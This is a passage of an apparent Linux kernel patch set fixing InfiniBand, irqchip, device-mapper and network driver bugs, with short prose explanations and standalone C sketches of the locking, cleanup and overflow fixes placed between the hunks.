+ 	STAGE_CREATE(MLX5_IB_STAGE_POST_IB_REG_UMR,
+ 		     mlx5_ib_stage_post_ib_reg_umr_init,
+ 		     NULL),
++	STAGE_CREATE(MLX5_IB_STAGE_DELAY_DROP,
++		     mlx5_ib_stage_delay_drop_init,
++		     mlx5_ib_stage_delay_drop_cleanup),
+ 	STAGE_CREATE(MLX5_IB_STAGE_RESTRACK,
+ 		     mlx5_ib_restrack_init,
+ 		     NULL),
+diff --git a/drivers/infiniband/hw/mlx5/mlx5_ib.h b/drivers/infiniband/hw/mlx5/mlx5_ib.h
+index 4a7f7064bd0eb..8d94e6834e01b 100644
+--- a/drivers/infiniband/hw/mlx5/mlx5_ib.h
++++ b/drivers/infiniband/hw/mlx5/mlx5_ib.h
+@@ -233,8 +233,19 @@ enum {
+ #define MLX5_IB_NUM_SNIFFER_FTS		2
+ #define MLX5_IB_NUM_EGRESS_FTS		1
+ #define MLX5_IB_NUM_FDB_FTS		MLX5_BY_PASS_NUM_REGULAR_PRIOS
++
++struct mlx5_ib_anchor {
++	struct mlx5_flow_table *ft;
++	struct mlx5_flow_group *fg_goto_table;
++	struct mlx5_flow_group *fg_drop;
++	struct mlx5_flow_handle *rule_goto_table;
++	struct mlx5_flow_handle *rule_drop;
++	unsigned int rule_goto_table_ref;
++};
++
+ struct mlx5_ib_flow_prio {
+ 	struct mlx5_flow_table		*flow_table;
++	struct mlx5_ib_anchor		anchor;
+ 	unsigned int			refcount;
+ };
+ 
+@@ -1553,6 +1564,9 @@ static inline bool mlx5_ib_lag_should_assign_affinity(struct mlx5_ib_dev *dev)
+ 	    MLX5_CAP_PORT_SELECTION(dev->mdev, port_select_flow_table_bypass))
+ 		return 0;
+ 
++	if (mlx5_lag_is_lacp_owner(dev->mdev) && !dev->lag_active)
++		return 0;
++
+ 	return dev->lag_active ||
+ 		(MLX5_CAP_GEN(dev->mdev, num_lag_ports) > 1 &&
+ 		 MLX5_CAP_GEN(dev->mdev, lag_tx_port_affinity));
+diff --git a/drivers/infiniband/hw/mlx5/qp.c b/drivers/infiniband/hw/mlx5/qp.c
+index f7d3643b08f50..ac53ed79ca64c 100644
+--- a/drivers/infiniband/hw/mlx5/qp.c
++++ b/drivers/infiniband/hw/mlx5/qp.c
+@@ -1156,6 +1156,9 @@ static int create_raw_packet_qp_tis(struct mlx5_ib_dev *dev,
+ 
+ 	MLX5_SET(create_tis_in, in, uid, to_mpd(pd)->uid);
+ 	MLX5_SET(tisc, tisc, transport_domain, tdn);
++	if (!mlx5_ib_lag_should_assign_affinity(dev) &&
++	    mlx5_lag_is_lacp_owner(dev->mdev))
++		MLX5_SET(tisc, tisc, strict_lag_tx_port_affinity, 1);
+ 	if (qp->flags & IB_QP_CREATE_SOURCE_QPN)
+ 		MLX5_SET(tisc, tisc, underlay_qpn, qp->underlay_qpn);
+ 
+diff --git a/drivers/infiniband/sw/rxe/rxe_net.c b/drivers/infiniband/sw/rxe/rxe_net.c
+index 35f327b9d4b8e..65d16024b3bf6 100644
+--- a/drivers/infiniband/sw/rxe/rxe_net.c
++++ b/drivers/infiniband/sw/rxe/rxe_net.c
+@@ -156,6 +156,9 @@ static int rxe_udp_encap_recv(struct sock *sk, struct sk_buff *skb)
+ 	pkt->mask = RXE_GRH_MASK;
+ 	pkt->paylen = be16_to_cpu(udph->len) - sizeof(*udph);
+ 
++	/* remove udp header */
++	skb_pull(skb, sizeof(struct udphdr));
++
+ 	rxe_rcv(skb);
+ 
+ 	return 0;
+@@ -397,6 +400,9 @@ static int rxe_loopback(struct sk_buff *skb, struct rxe_pkt_info *pkt)
+ 		return -EIO;
+ 	}
+ 
++	/* remove udp header */
++	skb_pull(skb, sizeof(struct udphdr));
++
+ 	rxe_rcv(skb);
+ 
+ 	return 0;
+diff --git a/drivers/infiniband/sw/rxe/rxe_qp.c b/drivers/infiniband/sw/rxe/rxe_qp.c
+index 1f6e006c51c4a..59b2024b34ef4 100644
+--- a/drivers/infiniband/sw/rxe/rxe_qp.c
++++ b/drivers/infiniband/sw/rxe/rxe_qp.c
+@@ -180,6 +180,9 @@ static void rxe_qp_init_misc(struct rxe_dev *rxe, struct rxe_qp *qp,
+ 	spin_lock_init(&qp->rq.producer_lock);
+ 	spin_lock_init(&qp->rq.consumer_lock);
+ 
++	skb_queue_head_init(&qp->req_pkts);
++	skb_queue_head_init(&qp->resp_pkts);
++
+ 	atomic_set(&qp->ssn, 0);
+ 	atomic_set(&qp->skb_out, 0);
+ }
+@@ -240,12 +243,8 @@ static int rxe_qp_init_req(struct rxe_dev *rxe, struct rxe_qp *qp,
+ 	qp->req.opcode		= -1;
+ 	qp->comp.opcode		= -1;
+ 
+-	skb_queue_head_init(&qp->req_pkts);
+-
+-	rxe_init_task(&qp->req.task, qp,
+-		      rxe_requester, "req");
+-	rxe_init_task(&qp->comp.task, qp,
+-		      rxe_completer, "comp");
++	rxe_init_task(&qp->req.task, qp, rxe_requester);
++	rxe_init_task(&qp->comp.task, qp, rxe_completer);
+ 
+ 	qp->qp_timeout_jiffies = 0; /* Can't be set for UD/UC in modify_qp */
+ 	if (init->qp_type == IB_QPT_RC) {
+@@ -290,10 +289,7 @@ static int rxe_qp_init_resp(struct rxe_dev *rxe, struct rxe_qp *qp,
+ 		}
+ 	}
+ 
+-	skb_queue_head_init(&qp->resp_pkts);
+-
+-	rxe_init_task(&qp->resp.task, qp,
+-		      rxe_responder, "resp");
++	rxe_init_task(&qp->resp.task, qp, rxe_responder);
+ 
+ 	qp->resp.opcode		= OPCODE_NONE;
+ 	qp->resp.msn		= 0;
+diff --git a/drivers/infiniband/sw/rxe/rxe_resp.c b/drivers/infiniband/sw/rxe/rxe_resp.c
+index 693081e813ec0..9f65c346d8432 100644
+--- a/drivers/infiniband/sw/rxe/rxe_resp.c
++++ b/drivers/infiniband/sw/rxe/rxe_resp.c
+@@ -466,8 +466,9 @@ static enum resp_states check_rkey(struct rxe_qp *qp,
+ 		if (mw->access & IB_ZERO_BASED)
+ 			qp->resp.offset = mw->addr;
+ 
+-		rxe_put(mw);
+ 		rxe_get(mr);
++		rxe_put(mw);
++		mw = NULL;
+ 	} else {
+ 		mr = lookup_mr(qp->pd, access, rkey, RXE_LOOKUP_REMOTE);
+ 		if (!mr) {
+diff --git a/drivers/infiniband/sw/rxe/rxe_task.c b/drivers/infiniband/sw/rxe/rxe_task.c
+index ec2b7de1c4972..182d0532a8ab9 100644
+--- a/drivers/infiniband/sw/rxe/rxe_task.c
++++ b/drivers/infiniband/sw/rxe/rxe_task.c
+@@ -94,12 +94,10 @@ void rxe_do_task(struct tasklet_struct *t)
+ 	task->ret = ret;
+ }
+ 
+-int rxe_init_task(struct rxe_task *task,
+-		  void *arg, int (*func)(void *), char *name)
++int rxe_init_task(struct rxe_task *task, void *arg, int (*func)(void *))
+ {
+ 	task->arg	= arg;
+ 	task->func	= func;
+-	snprintf(task->name, sizeof(task->name), "%s", name);
+ 	task->destroyed	= false;
+ 
+ 	tasklet_setup(&task->tasklet, rxe_do_task);
+diff --git a/drivers/infiniband/sw/rxe/rxe_task.h b/drivers/infiniband/sw/rxe/rxe_task.h
+index 7f612a1c68a7b..b3dfd970d1dc6 100644
+--- a/drivers/infiniband/sw/rxe/rxe_task.h
++++ b/drivers/infiniband/sw/rxe/rxe_task.h
+@@ -25,7 +25,6 @@ struct rxe_task {
+ 	void			*arg;
+ 	int			(*func)(void *arg);
+ 	int			ret;
+-	char			name[16];
+ 	bool			destroyed;
+ };
+ 
+@@ -34,8 +33,7 @@ struct rxe_task {
+  *	arg  => parameter to pass to fcn
+  *	func => function to call until it returns != 0
+  */
+-int rxe_init_task(struct rxe_task *task,
+-		  void *arg, int (*func)(void *), char *name);
++int rxe_init_task(struct rxe_task *task, void *arg, int (*func)(void *));
+ 
+ /* cleanup task */
+ void rxe_cleanup_task(struct rxe_task *task);
+diff --git a/drivers/infiniband/ulp/isert/ib_isert.c b/drivers/infiniband/ulp/isert/ib_isert.c
+index 7cca171478a22..a7fef3ea77fe3 100644
+--- a/drivers/infiniband/ulp/isert/ib_isert.c
++++ b/drivers/infiniband/ulp/isert/ib_isert.c
+@@ -657,9 +657,13 @@ static int
+ isert_connect_error(struct rdma_cm_id *cma_id)
+ {
+ 	struct isert_conn *isert_conn = cma_id->qp->qp_context;
++	struct isert_np *isert_np = cma_id->context;
+ 
+ 	ib_drain_qp(isert_conn->qp);
++
++	mutex_lock(&isert_np->mutex);
+ 	list_del_init(&isert_conn->node);
++	mutex_unlock(&isert_np->mutex);
+ 	isert_conn->cm_id = NULL;
+ 	isert_put_conn(isert_conn);
+ 
+@@ -2432,6 +2436,7 @@ isert_free_np(struct iscsi_np *np)
+ {
+ 	struct isert_np *isert_np = np->np_context;
+ 	struct isert_conn *isert_conn, *n;
++	LIST_HEAD(drop_conn_list);
+ 
+ 	if (isert_np->cm_id)
+ 		rdma_destroy_id(isert_np->cm_id);
+@@ -2451,7 +2456,7 @@ isert_free_np(struct iscsi_np *np)
+ 					 node) {
+ 			isert_info("cleaning isert_conn %p state (%d)\n",
+ 				   isert_conn, isert_conn->state);
+-			isert_connect_release(isert_conn);
++			list_move_tail(&isert_conn->node, &drop_conn_list);
+ 		}
+ 	}
+ 
+@@ -2462,11 +2467,16 @@ isert_free_np(struct iscsi_np *np)
+ 					 node) {
+ 			isert_info("cleaning isert_conn %p state (%d)\n",
+ 				   isert_conn, isert_conn->state);
+-			isert_connect_release(isert_conn);
++			list_move_tail(&isert_conn->node, &drop_conn_list);
+ 		}
+ 	}
+ 	mutex_unlock(&isert_np->mutex);
+ 
++	list_for_each_entry_safe(isert_conn, n, &drop_conn_list, node) {
++		list_del_init(&isert_conn->node);
++		isert_connect_release(isert_conn);
++	}
++
+ 	np->np_context = NULL;
+ 	kfree(isert_np);
+ }
+@@ -2561,8 +2571,6 @@ static void isert_wait_conn(struct iscsit_conn *conn)
+ 	isert_put_unsol_pending_cmds(conn);
+ 	isert_wait4cmds(conn);
+ 	isert_wait4logout(isert_conn);
+-
+-	queue_work(isert_release_wq, &isert_conn->release_work);
+ }
+ 
+ static void isert_free_conn(struct iscsit_conn *conn)
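
The isert change above uses a standard pattern: detach entries onto a private
list while the mutex is held, then release them after it drops, so a
potentially sleeping release path never runs under the lock. A standalone
sketch with a minimal singly linked list (names illustrative):

#include <stdio.h>
#include <stdlib.h>
#include <pthread.h>

struct conn {
	int id;
	struct conn *next;
};

static pthread_mutex_t list_lock = PTHREAD_MUTEX_INITIALIZER;
static struct conn *live_conns;

/* Detach everything under the lock, release outside it. */
static void free_all_conns(void)
{
	struct conn *drop, *c;

	pthread_mutex_lock(&list_lock);
	drop = live_conns;		/* move the whole list aside */
	live_conns = NULL;
	pthread_mutex_unlock(&list_lock);

	while ((c = drop)) {		/* may sleep; lock not held */
		drop = c->next;
		printf("releasing conn %d\n", c->id);
		free(c);
	}
}

int main(void)
{
	for (int i = 0; i < 3; i++) {
		struct conn *c = malloc(sizeof(*c));

		c->id = i;
		c->next = live_conns;
		live_conns = c;
	}
	free_all_conns();
	return 0;
}
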
+diff --git a/drivers/infiniband/ulp/rtrs/rtrs-clt.c b/drivers/infiniband/ulp/rtrs/rtrs-clt.c
+index 730f2f1e09bbd..a67f58359de9e 100644
+--- a/drivers/infiniband/ulp/rtrs/rtrs-clt.c
++++ b/drivers/infiniband/ulp/rtrs/rtrs-clt.c
+@@ -2042,6 +2042,7 @@ static int rtrs_clt_rdma_cm_handler(struct rdma_cm_id *cm_id,
+ 	return 0;
+ }
+ 
++/* The caller should do the cleanup in case of error */
+ static int create_cm(struct rtrs_clt_con *con)
+ {
+ 	struct rtrs_path *s = con->c.path;
+@@ -2064,14 +2065,14 @@ static int create_cm(struct rtrs_clt_con *con)
+ 	err = rdma_set_reuseaddr(cm_id, 1);
+ 	if (err != 0) {
+ 		rtrs_err(s, "Set address reuse failed, err: %d\n", err);
+-		goto destroy_cm;
++		return err;
+ 	}
+ 	err = rdma_resolve_addr(cm_id, (struct sockaddr *)&clt_path->s.src_addr,
+ 				(struct sockaddr *)&clt_path->s.dst_addr,
+ 				RTRS_CONNECT_TIMEOUT_MS);
+ 	if (err) {
+ 		rtrs_err(s, "Failed to resolve address, err: %d\n", err);
+-		goto destroy_cm;
++		return err;
+ 	}
+ 	/*
+ 	 * Combine connection status and session events. This is needed
+@@ -2086,29 +2087,15 @@ static int create_cm(struct rtrs_clt_con *con)
+ 		if (err == 0)
+ 			err = -ETIMEDOUT;
+ 		/* Timedout or interrupted */
+-		goto errr;
+-	}
+-	if (con->cm_err < 0) {
+-		err = con->cm_err;
+-		goto errr;
++		return err;
+ 	}
+-	if (READ_ONCE(clt_path->state) != RTRS_CLT_CONNECTING) {
++	if (con->cm_err < 0)
++		return con->cm_err;
++	if (READ_ONCE(clt_path->state) != RTRS_CLT_CONNECTING)
+ 		/* Device removal */
+-		err = -ECONNABORTED;
+-		goto errr;
+-	}
++		return -ECONNABORTED;
+ 
+ 	return 0;
+-
+-errr:
+-	stop_cm(con);
+-	mutex_lock(&con->con_mutex);
+-	destroy_con_cq_qp(con);
+-	mutex_unlock(&con->con_mutex);
+-destroy_cm:
+-	destroy_cm(con);
+-
+-	return err;
+ }
+ 
+ static void rtrs_clt_path_up(struct rtrs_clt_path *clt_path)
+@@ -2336,7 +2323,7 @@ static void rtrs_clt_close_work(struct work_struct *work)
+ static int init_conns(struct rtrs_clt_path *clt_path)
+ {
+ 	unsigned int cid;
+-	int err;
++	int err, i;
+ 
+ 	/*
+ 	 * On every new session connections increase reconnect counter
+@@ -2352,10 +2339,8 @@ static int init_conns(struct rtrs_clt_path *clt_path)
+ 			goto destroy;
+ 
+ 		err = create_cm(to_clt_con(clt_path->s.con[cid]));
+-		if (err) {
+-			destroy_con(to_clt_con(clt_path->s.con[cid]));
++		if (err)
+ 			goto destroy;
+-		}
+ 	}
+ 	err = alloc_path_reqs(clt_path);
+ 	if (err)
+@@ -2366,15 +2351,21 @@ static int init_conns(struct rtrs_clt_path *clt_path)
+ 	return 0;
+ 
+ destroy:
+-	while (cid--) {
+-		struct rtrs_clt_con *con = to_clt_con(clt_path->s.con[cid]);
++	/* Make sure the cleanup runs in the same order the connections were created */
++	for (i = 0; i <= cid; i++) {
++		struct rtrs_clt_con *con;
+ 
+-		stop_cm(con);
++		if (!clt_path->s.con[i])
++			break;
+ 
+-		mutex_lock(&con->con_mutex);
+-		destroy_con_cq_qp(con);
+-		mutex_unlock(&con->con_mutex);
+-		destroy_cm(con);
++		con = to_clt_con(clt_path->s.con[i]);
++		if (con->c.cm_id) {
++			stop_cm(con);
++			mutex_lock(&con->con_mutex);
++			destroy_con_cq_qp(con);
++			mutex_unlock(&con->con_mutex);
++			destroy_cm(con);
++		}
+ 		destroy_con(con);
+ 	}
+ 	/*
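
With create_cm() no longer cleaning up after itself, init_conns() above owns
all unwinding: one loop walks the connections in creation order and skips any
slot that was never set up. A sketch of that single-cleanup-path shape, with
an illustrative mid-sequence failure:

#include <stdio.h>

#define NR_CONS 4

static int cons[NR_CONS];	/* 0 = not created, 1 = created */

static int create_con(int i)
{
	if (i == 2)
		return -1;	/* simulate a mid-sequence failure */
	cons[i] = 1;
	return 0;
}

static void destroy_con(int i)
{
	cons[i] = 0;
	printf("destroyed con %d\n", i);
}

static int init_cons(void)
{
	int err = 0, i;

	for (i = 0; i < NR_CONS; i++) {
		err = create_con(i);
		if (err)
			goto destroy;
	}
	return 0;

destroy:
	/* One cleanup path: walk from the start and stop at the
	 * first slot that was never created. */
	for (i = 0; i < NR_CONS; i++) {
		if (!cons[i])
			break;
		destroy_con(i);
	}
	return err;
}

int main(void)
{
	printf("err=%d\n", init_cons());
	return 0;
}
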
+diff --git a/drivers/infiniband/ulp/rtrs/rtrs.c b/drivers/infiniband/ulp/rtrs/rtrs.c
+index ed324b47d93ae..716ec7baddefd 100644
+--- a/drivers/infiniband/ulp/rtrs/rtrs.c
++++ b/drivers/infiniband/ulp/rtrs/rtrs.c
+@@ -37,8 +37,10 @@ struct rtrs_iu *rtrs_iu_alloc(u32 iu_num, size_t size, gfp_t gfp_mask,
+ 			goto err;
+ 
+ 		iu->dma_addr = ib_dma_map_single(dma_dev, iu->buf, size, dir);
+-		if (ib_dma_mapping_error(dma_dev, iu->dma_addr))
++		if (ib_dma_mapping_error(dma_dev, iu->dma_addr)) {
++			kfree(iu->buf);
+ 			goto err;
++		}
+ 
+ 		iu->cqe.done  = done;
+ 		iu->size      = size;
+diff --git a/drivers/irqchip/irq-gic-common.c b/drivers/irqchip/irq-gic-common.c
+index a610821c8ff2a..afd6a1841715a 100644
+--- a/drivers/irqchip/irq-gic-common.c
++++ b/drivers/irqchip/irq-gic-common.c
+@@ -16,7 +16,13 @@ void gic_enable_of_quirks(const struct device_node *np,
+ 			  const struct gic_quirk *quirks, void *data)
+ {
+ 	for (; quirks->desc; quirks++) {
+-		if (!of_device_is_compatible(np, quirks->compatible))
++		if (!quirks->compatible && !quirks->property)
++			continue;
++		if (quirks->compatible &&
++		    !of_device_is_compatible(np, quirks->compatible))
++			continue;
++		if (quirks->property &&
++		    !of_property_read_bool(np, quirks->property))
+ 			continue;
+ 		if (quirks->init(data))
+ 			pr_info("GIC: enabling workaround for %s\n",
+@@ -28,7 +34,7 @@ void gic_enable_quirks(u32 iidr, const struct gic_quirk *quirks,
+ 		void *data)
+ {
+ 	for (; quirks->desc; quirks++) {
+-		if (quirks->compatible)
++		if (quirks->compatible || quirks->property)
+ 			continue;
+ 		if (quirks->iidr != (quirks->mask & iidr))
+ 			continue;
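
The quirk-table change above lets an entry match on a compatible string, a
device-tree property, or neither (in which case the OF path skips it). A
standalone sketch of table-driven matching with optional predicates, plain
strings standing in for the OF lookups (entries illustrative):

#include <stdio.h>
#include <string.h>

struct quirk {
	const char *desc;
	const char *compatible;	/* optional criterion */
	const char *property;	/* optional criterion */
};

static const struct quirk quirks[] = {
	{ "compat quirk", "vendor,gic-v3", NULL },
	{ "property quirk", NULL, "vendor,broken-save-restore-fw" },
	{ NULL, NULL, NULL },
};

/* Apply every quirk whose optional criteria all match. */
static void apply_quirks(const char *compat, const char *prop)
{
	const struct quirk *q;

	for (q = quirks; q->desc; q++) {
		if (!q->compatible && !q->property)
			continue;	/* not an OF-matched quirk */
		if (q->compatible && strcmp(q->compatible, compat))
			continue;
		if (q->property && (!prop || strcmp(q->property, prop)))
			continue;
		printf("enabling workaround for %s\n", q->desc);
	}
}

int main(void)
{
	apply_quirks("vendor,gic-v3", NULL);
	apply_quirks("other,gic", "vendor,broken-save-restore-fw");
	return 0;
}
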
+diff --git a/drivers/irqchip/irq-gic-common.h b/drivers/irqchip/irq-gic-common.h
+index 27e3d4ed4f328..3db4592cda1c0 100644
+--- a/drivers/irqchip/irq-gic-common.h
++++ b/drivers/irqchip/irq-gic-common.h
+@@ -13,6 +13,7 @@
+ struct gic_quirk {
+ 	const char *desc;
+ 	const char *compatible;
++	const char *property;
+ 	bool (*init)(void *data);
+ 	u32 iidr;
+ 	u32 mask;
+diff --git a/drivers/irqchip/irq-gic-v3.c b/drivers/irqchip/irq-gic-v3.c
+index 2182f87d2d12e..11f7c53e4b634 100644
+--- a/drivers/irqchip/irq-gic-v3.c
++++ b/drivers/irqchip/irq-gic-v3.c
+@@ -38,6 +38,7 @@
+ 
+ #define FLAGS_WORKAROUND_GICR_WAKER_MSM8996	(1ULL << 0)
+ #define FLAGS_WORKAROUND_CAVIUM_ERRATUM_38539	(1ULL << 1)
++#define FLAGS_WORKAROUND_MTK_GICR_SAVE		(1ULL << 2)
+ 
+ #define GIC_IRQ_TYPE_PARTITION	(GIC_IRQ_TYPE_LPI + 1)
+ 
+@@ -1730,6 +1731,15 @@ static bool gic_enable_quirk_msm8996(void *data)
+ 	return true;
+ }
+ 
++static bool gic_enable_quirk_mtk_gicr(void *data)
++{
++	struct gic_chip_data *d = data;
++
++	d->flags |= FLAGS_WORKAROUND_MTK_GICR_SAVE;
++
++	return true;
++}
++
+ static bool gic_enable_quirk_cavium_38539(void *data)
+ {
+ 	struct gic_chip_data *d = data;
+@@ -1802,6 +1812,11 @@ static const struct gic_quirk gic_quirks[] = {
+ 		.compatible = "qcom,msm8996-gic-v3",
+ 		.init	= gic_enable_quirk_msm8996,
+ 	},
++	{
++		.desc	= "GICv3: Mediatek Chromebook GICR save problem",
++		.property = "mediatek,broken-save-restore-fw",
++		.init	= gic_enable_quirk_mtk_gicr,
++	},
+ 	{
+ 		.desc	= "GICv3: HIP06 erratum 161010803",
+ 		.iidr	= 0x0204043b,
+@@ -1844,6 +1859,11 @@ static void gic_enable_nmi_support(void)
+ 	if (!gic_prio_masking_enabled())
+ 		return;
+ 
++	if (gic_data.flags & FLAGS_WORKAROUND_MTK_GICR_SAVE) {
++		pr_warn("Skipping NMI enable due to firmware issues\n");
++		return;
++	}
++
+ 	ppi_nmi_refs = kcalloc(gic_data.ppi_nr, sizeof(*ppi_nmi_refs), GFP_KERNEL);
+ 	if (!ppi_nmi_refs)
+ 		return;
+diff --git a/drivers/irqchip/irq-meson-gpio.c b/drivers/irqchip/irq-meson-gpio.c
+index 2aaa9aad3e87a..7da18ef952119 100644
+--- a/drivers/irqchip/irq-meson-gpio.c
++++ b/drivers/irqchip/irq-meson-gpio.c
+@@ -150,7 +150,7 @@ static const struct meson_gpio_irq_params s4_params = {
+ 	INIT_MESON_S4_COMMON_DATA(82)
+ };
+ 
+-static const struct of_device_id meson_irq_gpio_matches[] = {
++static const struct of_device_id meson_irq_gpio_matches[] __maybe_unused = {
+ 	{ .compatible = "amlogic,meson8-gpio-intc", .data = &meson8_params },
+ 	{ .compatible = "amlogic,meson8b-gpio-intc", .data = &meson8b_params },
+ 	{ .compatible = "amlogic,meson-gxbb-gpio-intc", .data = &gxbb_params },
+diff --git a/drivers/md/dm-ioctl.c b/drivers/md/dm-ioctl.c
+index 83aecd9250ba6..6ae1c19b82433 100644
+--- a/drivers/md/dm-ioctl.c
++++ b/drivers/md/dm-ioctl.c
+@@ -1151,13 +1151,10 @@ static int do_resume(struct dm_ioctl *param)
+ 	/* Do we need to load a new map ? */
+ 	if (new_map) {
+ 		sector_t old_size, new_size;
+-		int srcu_idx;
+ 
+ 		/* Suspend if it isn't already suspended */
+-		old_map = dm_get_live_table(md, &srcu_idx);
+-		if ((param->flags & DM_SKIP_LOCKFS_FLAG) || !old_map)
++		if (param->flags & DM_SKIP_LOCKFS_FLAG)
+ 			suspend_flags &= ~DM_SUSPEND_LOCKFS_FLAG;
+-		dm_put_live_table(md, srcu_idx);
+ 		if (param->flags & DM_NOFLUSH_FLAG)
+ 			suspend_flags |= DM_SUSPEND_NOFLUSH_FLAG;
+ 		if (!dm_suspended_md(md))
+diff --git a/drivers/md/dm-thin-metadata.c b/drivers/md/dm-thin-metadata.c
+index 80545ec541210..59eb1cb7037a0 100644
+--- a/drivers/md/dm-thin-metadata.c
++++ b/drivers/md/dm-thin-metadata.c
+@@ -1750,13 +1750,15 @@ int dm_thin_remove_range(struct dm_thin_device *td,
+ 
+ int dm_pool_block_is_shared(struct dm_pool_metadata *pmd, dm_block_t b, bool *result)
+ {
+-	int r;
++	int r = -EINVAL;
+ 	uint32_t ref_count;
+ 
+ 	down_read(&pmd->root_lock);
+-	r = dm_sm_get_count(pmd->data_sm, b, &ref_count);
+-	if (!r)
+-		*result = (ref_count > 1);
++	if (!pmd->fail_io) {
++		r = dm_sm_get_count(pmd->data_sm, b, &ref_count);
++		if (!r)
++			*result = (ref_count > 1);
++	}
+ 	up_read(&pmd->root_lock);
+ 
+ 	return r;
+@@ -1764,10 +1766,11 @@ int dm_pool_block_is_shared(struct dm_pool_metadata *pmd, dm_block_t b, bool *re
+ 
+ int dm_pool_inc_data_range(struct dm_pool_metadata *pmd, dm_block_t b, dm_block_t e)
+ {
+-	int r = 0;
++	int r = -EINVAL;
+ 
+ 	pmd_write_lock(pmd);
+-	r = dm_sm_inc_blocks(pmd->data_sm, b, e);
++	if (!pmd->fail_io)
++		r = dm_sm_inc_blocks(pmd->data_sm, b, e);
+ 	pmd_write_unlock(pmd);
+ 
+ 	return r;
+@@ -1775,10 +1778,11 @@ int dm_pool_inc_data_range(struct dm_pool_metadata *pmd, dm_block_t b, dm_block_
+ 
+ int dm_pool_dec_data_range(struct dm_pool_metadata *pmd, dm_block_t b, dm_block_t e)
+ {
+-	int r = 0;
++	int r = -EINVAL;
+ 
+ 	pmd_write_lock(pmd);
+-	r = dm_sm_dec_blocks(pmd->data_sm, b, e);
++	if (!pmd->fail_io)
++		r = dm_sm_dec_blocks(pmd->data_sm, b, e);
+ 	pmd_write_unlock(pmd);
+ 
+ 	return r;
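
Each dm-thin accessor above now tests pmd->fail_io under the metadata lock,
so no space-map call is issued once the pool is in fail mode. The same guard
shape as a standalone sketch, with a plain mutex in place of the pmd root
lock (names illustrative):

#include <pthread.h>
#include <stdbool.h>
#include <stdio.h>

static pthread_mutex_t md_lock = PTHREAD_MUTEX_INITIALIZER;
static bool fail_io;

static int do_metadata_op(void) { return 0; }	/* stand-in */

/* Refuse metadata work once the device is in fail mode; the flag
 * is only trusted while the lock is held. */
static int guarded_op(void)
{
	int r = -22;	/* mirrors -EINVAL */

	pthread_mutex_lock(&md_lock);
	if (!fail_io)
		r = do_metadata_op();
	pthread_mutex_unlock(&md_lock);
	return r;
}

int main(void)
{
	printf("%d\n", guarded_op());	/* 0 */
	fail_io = true;
	printf("%d\n", guarded_op());	/* -22 */
	return 0;
}
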
+diff --git a/drivers/md/dm-thin.c b/drivers/md/dm-thin.c
+index d12aff50974a9..601f9e4e6234f 100644
+--- a/drivers/md/dm-thin.c
++++ b/drivers/md/dm-thin.c
+@@ -398,8 +398,7 @@ static int issue_discard(struct discard_op *op, dm_block_t data_b, dm_block_t da
+ 	sector_t s = block_to_sectors(tc->pool, data_b);
+ 	sector_t len = block_to_sectors(tc->pool, data_e - data_b);
+ 
+-	return __blkdev_issue_discard(tc->pool_dev->bdev, s, len, GFP_NOWAIT,
+-				      &op->bio);
++	return __blkdev_issue_discard(tc->pool_dev->bdev, s, len, GFP_NOIO, &op->bio);
+ }
+ 
+ static void end_discard(struct discard_op *op, int r)
+diff --git a/drivers/md/dm.c b/drivers/md/dm.c
+index 24284d22f15bc..acf7e7551c941 100644
+--- a/drivers/md/dm.c
++++ b/drivers/md/dm.c
+@@ -2801,6 +2801,10 @@ retry:
+ 	}
+ 
+ 	map = rcu_dereference_protected(md->map, lockdep_is_held(&md->suspend_lock));
++	if (!map) {
++		/* avoid deadlock with fs/namespace.c:do_mount() */
++		suspend_flags &= ~DM_SUSPEND_LOCKFS_FLAG;
++	}
+ 
+ 	r = __dm_suspend(md, map, suspend_flags, TASK_INTERRUPTIBLE, DMF_SUSPENDED);
+ 	if (r)
+diff --git a/drivers/net/dsa/ocelot/felix_vsc9959.c b/drivers/net/dsa/ocelot/felix_vsc9959.c
+index cc89cff029e1f..5f6af0870dfd6 100644
+--- a/drivers/net/dsa/ocelot/felix_vsc9959.c
++++ b/drivers/net/dsa/ocelot/felix_vsc9959.c
+@@ -1253,7 +1253,7 @@ static void vsc9959_tas_guard_bands_update(struct ocelot *ocelot, int port)
+ 	/* Consider the standard Ethernet overhead of 8 octets preamble+SFD,
+ 	 * 4 octets FCS, 12 octets IFG.
+ 	 */
+-	needed_bit_time_ps = (maxlen + 24) * picos_per_byte;
++	needed_bit_time_ps = (u64)(maxlen + 24) * picos_per_byte;
+ 
+ 	dev_dbg(ocelot->dev,
+ 		"port %d: max frame size %d needs %llu ps at speed %d\n",
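
The (u64) cast above is the whole fix: maxlen + 24 and picos_per_byte are
32-bit, so their product is computed in 32 bits and wraps before being
widened for the assignment. At 10 Mbps a jumbo frame needs roughly
9024 * 800000 ~= 7.2e9 ps, well past the 32-bit limit of about 4.29e9. A
minimal demonstration of the difference:

#include <stdint.h>
#include <stdio.h>

int main(void)
{
	uint32_t maxlen = 9000;			/* jumbo frame, octets */
	uint32_t picos_per_byte = 800000;	/* 10 Mbps */
	uint64_t wrong, right;

	/* 32-bit multiply wraps first, then is widened: bogus result. */
	wrong = (maxlen + 24) * picos_per_byte;

	/* Widen one operand first so the multiply happens in 64 bits. */
	right = (uint64_t)(maxlen + 24) * picos_per_byte;

	printf("wrong=%llu right=%llu\n",
	       (unsigned long long)wrong, (unsigned long long)right);
	return 0;
}
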
+diff --git a/drivers/net/ethernet/freescale/enetc/enetc_qos.c b/drivers/net/ethernet/freescale/enetc/enetc_qos.c
+index a8539a8554a13..762849959cc1b 100644
+--- a/drivers/net/ethernet/freescale/enetc/enetc_qos.c
++++ b/drivers/net/ethernet/freescale/enetc/enetc_qos.c
+@@ -189,8 +189,8 @@ int enetc_setup_tc_cbs(struct net_device *ndev, void *type_data)
+ 	int bw_sum = 0;
+ 	u8 bw;
+ 
+-	prio_top = netdev_get_prio_tc_map(ndev, tc_nums - 1);
+-	prio_next = netdev_get_prio_tc_map(ndev, tc_nums - 2);
++	prio_top = tc_nums - 1;
++	prio_next = tc_nums - 2;
+ 
+ 	/* Support highest prio and second prio tc in cbs mode */
+ 	if (tc != prio_top && tc != prio_next)
+diff --git a/drivers/net/ethernet/intel/iavf/iavf.h b/drivers/net/ethernet/intel/iavf/iavf.h
+index 93a998f169de7..6625625f91e47 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf.h
++++ b/drivers/net/ethernet/intel/iavf/iavf.h
+@@ -525,7 +525,7 @@ void iavf_set_ethtool_ops(struct net_device *netdev);
+ void iavf_update_stats(struct iavf_adapter *adapter);
+ void iavf_reset_interrupt_capability(struct iavf_adapter *adapter);
+ int iavf_init_interrupt_scheme(struct iavf_adapter *adapter);
+-void iavf_irq_enable_queues(struct iavf_adapter *adapter, u32 mask);
